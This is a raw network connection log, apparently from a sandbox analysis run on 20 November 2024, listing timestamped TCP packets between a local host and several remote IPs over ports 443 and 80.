                                                                                                            Nov 20, 2024 16:57:52.171621084 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.171715021 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.171724081 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.174860954 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.174954891 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.174964905 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.178857088 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.178944111 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.178953886 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.181303024 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.181391001 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.181400061 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.185239077 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.185334921 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.185344934 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.188167095 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.188240051 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.188250065 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.191137075 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.191214085 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.191225052 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.195359945 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.195439100 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.195447922 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.196765900 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.196839094 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.196849108 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.349510908 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.349611044 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.349626064 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.351748943 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.351769924 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.351788998 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.351818085 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.351830006 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.351881981 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.354799986 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.354820967 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.354837894 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.354860067 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.354871988 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.354880095 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.358649015 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.358669996 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.358712912 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.358725071 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.358735085 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.360915899 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.360980034 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.360989094 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.361114025 CET44349168142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:57:52.361213923 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:52.391592026 CET49168443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:57:53.179629087 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:53.179760933 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:53.223829985 CET44349172198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:53.223932028 CET49172443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:53.942492962 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:53.942536116 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:53.942961931 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:53.943042040 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:53.957250118 CET49172443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:53.957290888 CET44349172198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:53.957811117 CET44349172198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:53.957871914 CET49172443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:54.177464962 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:54.219335079 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:54.579256058 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:54.579355955 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:54.579500914 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:54.580635071 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:54.580635071 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:54.581650019 CET4917080192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:54.581897974 CET4917380192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:54.701729059 CET8049170192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:54.701805115 CET4917080192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:54.702061892 CET8049173192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:54.702125072 CET4917380192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:54.702392101 CET4917380192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:54.822135925 CET8049173192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:54.966417074 CET49171443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:54.966458082 CET44349171198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:55.899717093 CET8049173192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:55.899830103 CET4917380192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:00.895512104 CET8049173192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:58:00.895581007 CET4917380192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:02.722744942 CET49172443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:58:02.722882986 CET4917380192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:58:08.975142956 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:08.975193977 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:08.975343943 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:08.976959944 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:08.976970911 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.281929016 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:10.282061100 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:10.286644936 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:10.286670923 CET44349174142.215.209.78192.168.2.22
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 20, 2024 16:58:10.287739992 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.342538118 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:10.387336969 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.627104044 CET  49175        80         192.168.2.22     192.3.220.29
Nov 20, 2024 16:58:10.725115061 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.725150108 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.725836992 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:10.725866079 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.726417065 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.726428032 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.726480007 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:10.726488113 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.746701956 CET  80           49175      192.3.220.29     192.168.2.22
Nov 20, 2024 16:58:10.746814013 CET  49175        80         192.168.2.22     192.3.220.29
Nov 20, 2024 16:58:10.746967077 CET  49175        80         192.168.2.22     192.3.220.29
Nov 20, 2024 16:58:10.866533041 CET  80           49175      192.3.220.29     192.168.2.22
Nov 20, 2024 16:58:10.931971073 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.932126045 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:10.932163954 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.954777002 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.954802036 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.954823017 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.954864025 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:10.954895973 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.954909086 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:10.984669924 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.984682083 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.984715939 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:10.984791994 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:10.984807968 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.011105061 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.011112928 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.011141062 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.011174917 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.011185884 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.011317968 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.138223886 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.138235092 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.138259888 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.138283968 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.138313055 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.155930042 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.155940056 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.155968904 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.155985117 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.155999899 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.168848038 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.168859005 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.168888092 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.168915033 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.168931007 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.182972908 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.182984114 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.183010101 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.183072090 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.183088064 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.201724052 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.201735020 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.201836109 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.201854944 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.205401897 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.217204094 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.217212915 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.217281103 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.217289925 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.249958992 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.250001907 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.250036955 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.250047922 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.250087023 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.338491917 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.338505983 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.338608027 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.338625908 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.348397017 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.348407030 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.348488092 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.348516941 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.359240055 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.359247923 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.359308958 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.359325886 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.372750044 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.372759104 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.372828007 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.372837067 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.380501032 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.380510092 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.380534887 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.380573034 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.380582094 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.380624056 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.387772083 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.387779951 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.387837887 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.387842894 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.393565893 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.393577099 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.393631935 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.393637896 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.401359081 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.401371002 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.401420116 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.401427984 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.407885075 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.407893896 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.407968998 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.407977104 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.414858103 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.414868116 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.414931059 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.414938927 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.420599937 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.420610905 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.420664072 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.420670986 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.426616907 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.426625967 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.426681995 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.426693916 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.533310890 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.533348083 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.533417940 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.533432961 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.533444881 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.538857937 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.538868904 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.538897038 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.538952112 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.538959980 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.539004087 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.545347929 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.545357943 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.545380116 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.545430899 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.545448065 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.551269054 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.551279068 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.551296949 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.551342010 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.551363945 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.555126905 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.555140018 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.555217981 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.555224895 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.559413910 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.560264111 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.560280085 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.560333014 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.560339928 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.567951918 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.567991018 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.568026066 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.568037033 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.568105936 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.573340893 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.573362112 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.573429108 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.573482990 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.577867031 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.577938080 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.577949047 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.581729889 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.581794977 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.581804991 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.585278988 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.585346937 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.585355997 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.589613914 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.589682102 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.589694023 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.592869997 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.592942953 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.592950106 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.596324921 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.596393108 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.596400976 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.600291014 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.600359917 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.600368023 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.732054949 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.732136011 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.732168913 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.735476971 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.735491037 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.735518932 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.735539913 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.735548019 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.735583067 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.738537073 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.738548040 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.738581896 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.738616943 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.738637924 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.741837025 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.741847992 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.741873980 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.741894960 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.741914988 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.745242119 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.745255947 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.745271921 CET  443          49174      142.215.209.78   192.168.2.22
Nov 20, 2024 16:58:11.745306969 CET  49174        443        192.168.2.22     142.215.209.78
Nov 20, 2024 16:58:11.745332003 CET  49174        443        192.168.2.22     142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.748866081 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.748879910 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.748939991 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.748963118 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.751862049 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.751902103 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.751939058 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.751955032 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.752007008 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.754909039 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.754920006 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.754977942 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.754990101 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.758835077 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.758919001 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.758939028 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.761873960 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.761945963 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.761954069 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.765496016 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.765583992 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.765594006 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.768517971 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.768593073 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.768603086 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.772392035 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.772454023 CET49174443192.168.2.22142.215.209.78
                                                                                                            Nov 20, 2024 16:58:11.772464037 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.775429964 CET44349174142.215.209.78192.168.2.22
                                                                                                            Nov 20, 2024 16:58:11.775497913 CET49174443192.168.2.22142.215.209.78
